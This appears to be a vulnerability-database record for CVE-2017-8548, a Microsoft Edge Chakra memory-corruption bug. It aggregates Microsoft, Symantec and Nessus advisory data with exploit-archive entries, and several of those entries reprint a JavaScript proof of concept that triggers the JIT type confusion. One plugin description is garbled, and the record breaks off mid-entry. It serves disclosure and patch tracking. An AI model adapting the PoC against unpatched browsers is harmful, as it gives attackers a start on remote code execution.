A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.
In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the related rendering engine. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
The security update addresses the vulnerability by modifying how Microsoft browser JavaScript scripting engines handle objects in memory.
{"id": "MS:CVE-2017-8548", "bulletinFamily": "microsoft", "title": "Scripting Engine Memory Corruption Vulnerability", "description": "A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document that hosts the related rendering engine. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nAn attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThe security update addresses the vulnerability by modifying how Microsoft browser JavaScript scripting engines handle objects in memory.\n", "published": "2017-06-13T07:00:00", "modified": "2017-06-27T07:00:00", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.6, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 4.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.6, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8548", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-8548", "CVE-2017-8529"], "immutableFields": [], "type": "mscve", "lastseen": "2021-12-06T18:25:22", "edition": 1, "viewCount": 3, "enchantments": {"backreferences": {"references": [{"idList": ["TRENDMICROBLOG:7C04AD3395CF22028CC84BEFD34A2090"], "type": "trendmicroblog"}, {"idList": ["TALOSBLOG:212BF0D0902B16A1E3C6ABB19FCEB336"], "type": "talosblog"}, {"idList": ["OPENVAS:1361412562310811154", "OPENVAS:1361412562310811164", "OPENVAS:1361412562310811196", "OPENVAS:1361412562310810903", "OPENVAS:1361412562310811171", 
"OPENVAS:1361412562310811173", "OPENVAS:1361412562310811167"], "type": "openvas"}, {"idList": ["CISA:574A6E25827684C587359C37EF1D5132"], "type": "cisa"}, {"idList": ["CVE-2017-8548", "CVE-2017-8529"], "type": "cve"}, {"idList": ["PACKETSTORM:143795"], "type": "packetstorm"}, {"idList": ["KLA11045"], "type": "kaspersky"}, {"idList": ["SSV:96357"], "type": "seebug"}, {"idList": ["1337DAY-ID-28288"], "type": "zdt"}, {"idList": ["MS:CVE-2017-8466", "MS:CVE-2017-0288", "MS:CVE-2017-8490", "MS:CVE-2017-8532", "MS:CVE-2017-8524", "MS:CVE-2017-0282", "MS:CVE-2017-8482", "MS:CVE-2017-8554", "MS:CVE-2017-0287", "MS:CVE-2017-8478", "MS:CVE-2017-8530", "MS:CVE-2017-8517", "MS:CVE-2017-8465", "MS:CVE-2017-8476", "MS:CVE-2017-8494", "MS:CVE-2017-0298", "MS:CVE-2017-0295", "MS:CVE-2017-8547", "MS:CVE-2017-8579", "MS:CVE-2017-0193", "MS:CVE-2017-8469", "MS:CVE-2017-8492", "MS:CVE-2017-0219", "MS:CVE-2017-8477", "MS:CVE-2017-8543", "MS:CVE-2017-8470", "MS:CVE-2017-8474", "MS:CVE-2017-8553", "MS:CVE-2017-0297", "MS:CVE-2017-8468", "MS:CVE-2017-0300", "MS:CVE-2017-0296", "MS:CVE-2017-0299", "MS:CVE-2017-0218", "MS:CVE-2017-8528", "MS:CVE-2017-8475", "MS:CVE-2017-8489", "MS:CVE-2017-8531", "MS:CVE-2017-8504", "MS:CVE-2017-8527", "MS:CVE-2017-0284", "MS:CVE-2017-8480", "MS:CVE-2017-8483", "MS:CVE-2017-8481", "MS:CVE-2017-8544", "MS:CVE-2017-8498", "MS:CVE-2017-8473", "MS:CVE-2017-8485", "MS:CVE-2017-8499", "MS:CVE-2017-8534", "MS:CVE-2017-8460", "MS:CVE-2017-8523", "MS:CVE-2017-8493", "MS:CVE-2017-8497", "MS:CVE-2017-0294", "MS:CVE-2017-8520", "MS:CVE-2017-8491", "MS:CVE-2017-8471", "MS:CVE-2017-0215", "MS:CVE-2017-0286", "MS:CVE-2017-8522", "MS:CVE-2017-8488", "MS:CVE-2017-8576", "MS:CVE-2017-0216", "MS:CVE-2017-8496", "MS:CVE-2017-8549", "MS:CVE-2017-8484", "MS:CVE-2017-0291", "MS:CVE-2017-8575", "MS:CVE-2017-0173", "MS:CVE-2017-8521", "MS:CVE-2017-8462", "MS:CVE-2017-0292", "MS:CVE-2017-8529", "MS:CVE-2017-0283", "MS:CVE-2017-0285", "MS:CVE-2017-8479", "MS:CVE-2017-0289", 
"MS:CVE-2017-8555", "MS:CVE-2017-8472", "MS:CVE-2017-8533", "MS:CVE-2017-8519", "MS:CVE-2017-8515", "MS:CVE-2017-8464"], "type": "mscve"}, {"idList": ["THREATPOST:2C2827FBF9D900F4194802CE8C471B4C"], "type": "threatpost"}, {"idList": ["KB4036586", "KB4019473"], "type": "mskb"}, {"idList": ["RAPID7COMMUNITY:2686BC995183CF24B568CF55F2EDAD7B"], "type": "rapid7community"}, {"idList": ["SMB_NT_MS17_JUN_4022715_CVE-2017-8529.NASL"], "type": "nessus"}, {"idList": ["CPAI-2017-0168", "CPAI-2017-0456"], "type": "checkpoint_advisories"}]}, "dependencies": {"references": [{"idList": ["TRENDMICROBLOG:7C04AD3395CF22028CC84BEFD34A2090"], "type": "trendmicroblog"}, {"idList": ["TALOSBLOG:212BF0D0902B16A1E3C6ABB19FCEB336"], "type": "talosblog"}, {"idList": ["CVE-2017-8548", "CVE-2017-8529"], "type": "cve"}, {"idList": ["PACKETSTORM:143795"], "type": "packetstorm"}, {"idList": ["SSV:96357"], "type": "seebug"}, {"idList": ["1337DAY-ID-28288"], "type": "zdt"}, {"idList": ["SMB_NT_MS17_JUN_4022725.NASL", "SMB_NT_MS17_SEP_4038792.NASL", "SMB_NT_MS17_SEP_4038788.NASL", "SMB_NT_MS17_SEP_4038781.NASL", "SMB_NT_MS17_JUN_4022727.NASL", "SMB_NT_MS17_SEP_4038777.NASL", "SMB_NT_MS17_JUN_4022715.NASL", "SMB_NT_MS17_SEP_4038783.NASL", "SMB_NT_MS17_JUN_4022714.NASL", "SMB_NT_MS17_SEP_CVE-2017-8529.NASL", "SMB_NT_MS17_SEP_4038782.NASL", "SMB_NT_MS17_JUN_4022715_CVE-2017-8529.NASL", "SMB_NT_MS17_SEP_4038799.NASL", "SMB_NT_MS17_SEP_INTERNET_EXPLORER.NASL"], "type": "nessus"}, {"idList": ["KLA11842", "KLA11045"], "type": "kaspersky"}, {"idList": ["KB4036586"], "type": "mskb"}, {"idList": ["MS:CVE-2017-8466", "MS:CVE-2017-0288", "MS:CVE-2017-8490", "MS:CVE-2017-8532", "MS:CVE-2017-8524", "MS:CVE-2017-0282", "MS:CVE-2017-8482", "MS:CVE-2017-8554", "MS:CVE-2017-0287", "MS:CVE-2017-8478", "MS:CVE-2017-8530", "MS:CVE-2017-8517", "MS:CVE-2017-8465", "MS:CVE-2017-8476", "MS:CVE-2017-8494", "MS:CVE-2017-0298", "MS:CVE-2017-0295", "MS:CVE-2017-8547", "MS:CVE-2017-8579", "MS:CVE-2017-0193", "MS:CVE-2017-8469", 
"MS:CVE-2017-8492", "MS:CVE-2017-0219", "MS:CVE-2017-8477", "MS:CVE-2017-8543", "MS:CVE-2017-8470", "MS:CVE-2017-8474", "MS:CVE-2017-8553", "MS:CVE-2017-0297", "MS:CVE-2017-8468", "MS:CVE-2017-0300", "MS:CVE-2017-0296", "MS:CVE-2017-0299", "MS:CVE-2017-0218", "MS:CVE-2017-8528", "MS:CVE-2017-8475", "MS:CVE-2017-8489", "MS:CVE-2017-8531", "MS:CVE-2017-8504", "MS:CVE-2017-8527", "MS:CVE-2017-0284", "MS:CVE-2017-8480", "MS:CVE-2017-8483", "MS:CVE-2017-8481", "MS:CVE-2017-8544", "MS:CVE-2017-8498", "MS:CVE-2017-8473", "MS:CVE-2017-8485", "MS:CVE-2017-8499", "MS:CVE-2017-8534", "MS:CVE-2017-8460", "MS:CVE-2017-8523", "MS:CVE-2017-8493", "MS:CVE-2017-8497", "MS:CVE-2017-0294", "MS:CVE-2017-8520", "MS:CVE-2017-8491", "MS:CVE-2017-8471", "MS:CVE-2017-0215", "MS:CVE-2017-0286", "MS:CVE-2017-8522", "MS:CVE-2017-8488", "MS:CVE-2017-8576", "MS:CVE-2017-0216", "MS:CVE-2017-8496", "MS:CVE-2017-8549", "MS:CVE-2017-8484", "MS:CVE-2017-0291", "MS:CVE-2017-8575", "MS:CVE-2017-0173", "MS:CVE-2017-8521", "MS:CVE-2017-8462", "MS:CVE-2017-0292", "MS:CVE-2017-8529", "MS:CVE-2017-0283", "MS:CVE-2017-0285", "MS:CVE-2017-8479", "MS:CVE-2017-0289", "MS:CVE-2017-8555", "MS:CVE-2017-8472", "MS:CVE-2017-8533", "MS:CVE-2017-8519", "MS:CVE-2017-8515", "MS:CVE-2017-8464"], "type": "mscve"}, {"idList": ["OPENVAS:1361412562310811154", "OPENVAS:1361412562310810943", "OPENVAS:1361412562310811164", "OPENVAS:1361412562310811196", "OPENVAS:1361412562310810903", "OPENVAS:1361412562310811171", "OPENVAS:1361412562310811173", "OPENVAS:1361412562310811760", "OPENVAS:1361412562310811167"], "type": "openvas"}, {"idList": ["RAPID7COMMUNITY:2686BC995183CF24B568CF55F2EDAD7B"], "type": "rapid7community"}, {"idList": ["SMNTC-98953", "SMNTC-98954"], "type": "symantec"}, {"idList": ["CPAI-2017-0168", "CPAI-2017-0456"], "type": "checkpoint_advisories"}], "rev": 4}, "exploitation": null, "score": {"value": 1.5, "vector": "NONE"}, "vulnersScore": 1.5}, "kbList": ["KB4022725", "KB4019474", "KB4022715", "KB4019473", 
"KB4019472", "KB4016871", "KB4022727", "KB4022714"], "msrc": "", "mscve": "CVE-2017-8548", "msAffectedSoftware": [{"kb": "KB4022725", "kbSupersedence": "KB4016871", "msplatform": "Windows 10 Version 1703 for 32-bit Systems", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}, {"kb": "KB4022725", "kbSupersedence": "KB4016871", "msplatform": "Windows 10 Version 1703 for x64-based Systems", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}, {"kb": "KB4022715", "kbSupersedence": "KB4019472", "msplatform": "Windows 10 Version 1607 for 32-bit Systems", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}, {"kb": "KB4022727", "kbSupersedence": "KB4019474", "msplatform": "Windows 10 for x64-based Systems", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}, {"kb": "KB4022714", "kbSupersedence": "KB4019473", "msplatform": "Windows 10 Version 1511 for x64-based Systems", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}, {"kb": "KB4022727", "kbSupersedence": "KB4019474", "msplatform": "Windows 10 for 32-bit Systems", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}, {"kb": "KB4022715", "kbSupersedence": "KB4019472", "msplatform": "Windows 10 Version 1607 for x64-based Systems", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}, {"kb": "KB4022714", "kbSupersedence": "KB4019473", "msplatform": "Windows 10 Version 1511 for 32-bit Systems", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}, {"kb": "KB4022715", "kbSupersedence": "KB4019472", "msplatform": "Windows Server 2016", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}], "vendorCvss": {"baseScore": "4.2", "temporalScore": "3.8", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N/E:P/RL:O/RC:C"}, "_state": {"dependencies": 1647589307, "score": 1659749172}}
{"symantec": [{"lastseen": "2018-03-14T04:08:10", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-06-13T00:00:00", "type": "symantec", "title": "Microsoft Edge CVE-2017-8548 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-8548"], "modified": "2017-06-13T00:00:00", "id": "SMNTC-98954", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98954", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:23", "description": "### Description\n\nMicrosoft Internet Explorer and Edge are prone to an information disclosure vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks. Internet Explorer 9, 10, 11 and Edge are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Edge \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. 
Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-06-13T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer and Edge CVE-2017-8529 Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-8529"], "modified": "2017-06-13T00:00:00", "id": "SMNTC-98953", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98953", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-04-09T13:37:46", "description": "This is a follow-up finding that the fix for an incorrect jit optimization with TypedArray setter in Microsoft Edge Chakra may not be sufficient.", "cvss3": {}, "published": "2017-08-17T00:00:00", "type": "zdt", "title": "Microsoft Edge Chakra Incorrect Jit Optimization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8548"], "modified": "2017-08-17T00:00:00", "id": "1337DAY-ID-28288", "href": "https://0day.today/exploit/description/28288", "sourceData": "Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #2\r\n\r\nCVE-2017-8548\r\n\r\n\r\nI think the fix for #1045 is incorrect.\r\n\r\nHere's the original PoC.\r\n\r\n'use strict';\r\n\r\nfunction func(a, b, c) {\r\n a[0] = 1.2;\r\n b[0] = c;\r\n a[1] = 2.2;\r\n a[0] = 2.3023e-320;\r\n}\r\n\r\nfunction main() {\r\n var a = [1.1, 2.2];\r\n var b = new Uint32Array(100);\r\n\r\n // force to optimize\r\n for (var i = 0; i < 0x10000; i++)\r\n func(a, b, i);\r\n\r\n func(a, b, {valueOf: () => {\r\n a[0] = {};\r\n\r\n return 0;\r\n }});\r\n\r\n a[0].toString();\r\n}\r\n\r\nmain();\r\n\r\n\r\nI just changed \"var b = new Uint32Array(100);\" to \"var b = new Uint32Array(0);\", and it worked 
well.\r\n\r\nPoC:\r\n'use strict';\r\n\r\nfunction func(a, b, c) {\r\n a[0] = 1.2;\r\n b[0] = c;\r\n a[1] = 2.2;\r\n a[0] = 2.3023e-320;\r\n}\r\n\r\nfunction main() {\r\n var a = [1.1, 2.2];\r\n var b = new Uint32Array(0); // <<--------- 100 -> 0\r\n\r\n // force to optimize\r\n for (var i = 0; i < 0x10000; i++)\r\n func(a, b, i);\r\n\r\n func(a, b, {valueOf: () => {\r\n a[0] = {};\r\n\r\n return 0;\r\n }});\r\n\r\n a[0].toString();\r\n}\r\n\r\nmain();\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\n\r\nFound by: lokihardt\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/28288", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T11:55:52", "description": "I think the fix for #1045 is incorrect.\r\n\r\nHere's the original PoC.\r\n```\r\n'use strict';\r\n\r\nfunction func(a, b, c) {\r\n a[0] = 1.2;\r\n b[0] = c;\r\n a[1] = 2.2;\r\n a[0] = 2.3023e-320;\r\n}\r\n\r\nfunction main() {\r\n var a = [1.1, 2.2];\r\n var b = new Uint32Array(100);\r\n\r\n // force to optimize\r\n for (var i = 0; i < 0x10000; i++)\r\n func(a, b, i);\r\n\r\n func(a, b, {valueOf: () => {\r\n a[0] = {};\r\n\r\n return 0;\r\n }});\r\n\r\n a[0].toString();\r\n}\r\n\r\nmain();\r\n```\r\n\r\nI just changed \"`var b = new Uint32Array(100);`\" to \"`var b = new Uint32Array(0);`\", and it worked well.\r\n\r\n### PoC:\r\n```\r\n'use strict';\r\n\r\nfunction func(a, b, c) {\r\n a[0] = 1.2;\r\n b[0] = c;\r\n a[1] = 2.2;\r\n a[0] = 2.3023e-320;\r\n}\r\n\r\nfunction main() {\r\n var a = [1.1, 2.2];\r\n var b = new Uint32Array(0); // <<--------- 100 -> 0\r\n\r\n // force to optimize\r\n for (var i = 0; i < 0x10000; i++)\r\n func(a, b, i);\r\n\r\n func(a, b, {valueOf: () => {\r\n a[0] = {};\r\n\r\n return 0;\r\n }});\r\n\r\n 
a[0].toString();\r\n}\r\n\r\nmain();\r\n```", "cvss3": {}, "published": "2017-08-17T00:00:00", "type": "seebug", "title": "Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #2(CVE-2017-8548)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8548"], "modified": "2017-08-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96357", "id": "SSV:96357", "sourceData": "\n 'use strict';\r\n\r\nfunction func(a, b, c) {\r\n a[0] = 1.2;\r\n b[0] = c;\r\n a[1] = 2.2;\r\n a[0] = 2.3023e-320;\r\n}\r\n\r\nfunction main() {\r\n var a = [1.1, 2.2];\r\n var b = new Uint32Array(0); // <<--------- 100 -> 0\r\n\r\n // force to optimize\r\n for (var i = 0; i < 0x10000; i++)\r\n func(a, b, i);\r\n\r\n func(a, b, {valueOf: () => {\r\n a[0] = {};\r\n\r\n return 0;\r\n }});\r\n\r\n a[0].toString();\r\n}\r\n\r\nmain();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96357", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2017-08-18T07:28:40", "description": "", "cvss3": {}, "published": "2017-08-16T00:00:00", "type": "packetstorm", "title": "Microsoft Edge Chakra Incorrect Jit Optimization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8548"], "modified": "2017-08-16T00:00:00", "id": "PACKETSTORM:143795", "href": "https://packetstormsecurity.com/files/143795/Microsoft-Edge-Chakra-Incorrect-Jit-Optimization.html", "sourceData": "`Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #2 \n \nCVE-2017-8548 \n \n \nI think the fix for #1045 is incorrect. \n \nHere's the original PoC. 
\n \n'use strict'; \n \nfunction func(a, b, c) { \na[0] = 1.2; \nb[0] = c; \na[1] = 2.2; \na[0] = 2.3023e-320; \n} \n \nfunction main() { \nvar a = [1.1, 2.2]; \nvar b = new Uint32Array(100); \n \n// force to optimize \nfor (var i = 0; i < 0x10000; i++) \nfunc(a, b, i); \n \nfunc(a, b, {valueOf: () => { \na[0] = {}; \n \nreturn 0; \n}}); \n \na[0].toString(); \n} \n \nmain(); \n \n \nI just changed \"var b = new Uint32Array(100);\" to \"var b = new Uint32Array(0);\", and it worked well. \n \nPoC: \n'use strict'; \n \nfunction func(a, b, c) { \na[0] = 1.2; \nb[0] = c; \na[1] = 2.2; \na[0] = 2.3023e-320; \n} \n \nfunction main() { \nvar a = [1.1, 2.2]; \nvar b = new Uint32Array(0); // <<--------- 100 -> 0 \n \n// force to optimize \nfor (var i = 0; i < 0x10000; i++) \nfunc(a, b, i); \n \nfunc(a, b, {valueOf: () => { \na[0] = {}; \n \nreturn 0; \n}}); \n \na[0].toString(); \n} \n \nmain(); \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/143795/GS20170816235516.txt", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2023-01-11T15:04:57", "description": "This plugin was deprecated as it was referencing a CVE which wasn't properly fixed until September 2017. 
The replacement plugin (ID# 9999999) addresses all Windows 10 / Server 2016 registry and patch requirements for CVE-2017-8529.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-01-17T00:00:00", "type": "nessus", "title": "KB4022715: Windows 10 Version 1607 and Windows Server 2016 June 2017 (CVE-2017-8529) (deprecated)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529"], "modified": "2020-05-28T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUN_4022715_CVE-2017-8529.NASL", "href": "https://www.tenable.com/plugins/nessus/133048", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2020/05/22. 
Deprecated by smb_nt_ms17_sep_CVE-2017-8529.nasl.\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133048);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\"CVE-2017-8529\");\n script_bugtraq_id(98953);\n script_xref(name:\"MSKB\", value:\"4022715\");\n script_xref(name:\"MSFT\", value:\"MS17-4022715\");\n\n script_name(english:\"KB4022715: Windows 10 Version 1607 and Windows Server 2016 June 2017 (CVE-2017-8529) (deprecated)\");\n script_summary(english:\"Checks for presence of the patch rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"This plugin was depredated as it was referencing a CVE which wasn't properly fixed until September 2017. The replacement plugin addresses all Windows 10 / Server 2016 registry requirements for CVE-2017-8 (deprecais plugin was depredated as it was referencing a CVE which wasn't properly fixed until September 2017. 
The replacement plugin (ID# 9999999) addresses all Windows 10 / Server 2016 registry and patch requirements for CVE-2017-8529.\");\n # https://support.microsoft.com/en-us/help/4022715/windows-10-update-kb4022715\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4ac6572f\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8529\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f6a3c24\");\n script_set_attribute(attribute:\"solution\", value:\n\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8529\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T15:13:06", "description": "The remote Windows host is missing a security update or a registry setting required to enable protections for CVE-2017-8529. It is, therefore, affected by an information disclosure vulnerability:\n\n- An information disclosure vulnerability exists when affected Microsoft scripting engines do not properly handle objects in memory. The vulnerability could allow an attacker to detect specific files on the user's computer. In a web-based attack scenario, an attacker could host a website that is used to attempt to exploit the vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-05-28T00:00:00", "type": "nessus", "title": "Windows 10 / Windows Server 2016 September 2017 Information Disclosure Vulnerability (CVE-2017-8529)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", 